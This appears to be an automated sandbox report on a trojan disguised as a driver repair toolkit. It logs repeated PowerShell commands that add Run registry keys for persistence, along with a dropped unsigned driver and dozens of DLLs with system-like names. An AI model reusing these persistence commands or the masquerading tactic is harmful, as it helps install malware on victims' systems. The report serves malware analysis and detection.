Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'""
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess created: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe "C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe"
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell.exe -Command ""Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'""
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'""
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'"
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command ""Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'""
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile created: C:\Users\Public\ypkiExpertDriverToolkit
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fm00fodp.2tf.ps1
Source: classification engineClassification label: mal72.troj.evad.winZIP@19/98@20/24
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2824:120:WilError_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:120:WilError_02
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeMutant created: \Sessions\1\BaseNamedObjects\HookApi:{7DDF4ADB-4A01-4F4B-83AA-8D91C21E99D2}:5020:Lock
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile written: C:\ProgramData\ypkiExpertDriverToolkit\atiacmLocalisation.ini
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins
Source: file.zipStatic file information: File size 5428394 > 1048576

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command ""Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'""
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'"
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'"
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'"
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command ""Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'""

Persistence and Installation Behavior

barindex
Sample is not signed and drops a device driver
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\MouseA.sys
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\dxmasf.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\MouseA.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\netmsg.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\iologmsg.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\vcruntime140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\TelephonyInteractiveUserRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\secman.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\security.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDURDU.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\normaliz.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\detoured64.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\wmploc.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.Threading.Tasks.Extensions.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\icmp.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\PhoneServiceRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\imageres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\SrEvents.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\kbdnko.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\oleaccrc.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDLT.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\Microsoft-WindowsPhone-SEManagementProvider.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\ati2erec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\SyncRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\advapi32res.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDIT.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\bridgeres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\mxpLHRYdU.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\asferror.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\imagesp1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\wmdrmsdk.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDFA.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\microsoft-windows-processor-aggregator-events.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\tapiui.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\msafd.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\msxml6r.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\lltdres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\lz32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\msxml3r.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\MapControlStringsRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\shimeng.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\wlanutil.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\onnxruntime.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\RapidFireServer.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.Buffers.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\SensorsCpl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDKYR.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\MouseA.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDARME.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\RapidFireServer64.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\defragres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\mmres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\rnr20.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\tier2punctuations.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDIR.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\tzres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\msprivs.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\PhoneutilRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\msidntld.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\microsoft-windows-storage-tiering-events.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDUR.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.Runtime.WindowsRuntime.UI.Xaml.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\moricons.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\blbres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.Text.Encodings.Web.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\TpmCertResources.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\secman64.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\RDCameraDriver.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\detoured32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\wmi.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\DMAppsRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\ETWCoreUIComponentsResources.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\qedwipes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\ACLOGGER.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDARMW.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\neth.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\lpk.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\dmdskres2.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\XAudio2_8.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\comres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.ValueTuple.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\tzsyncres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\wmerror.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\ws2help.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\dmdskres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\dxmasf.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\MouseA.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\netmsg.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\iologmsg.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\vcruntime140.dllJump to dropped file
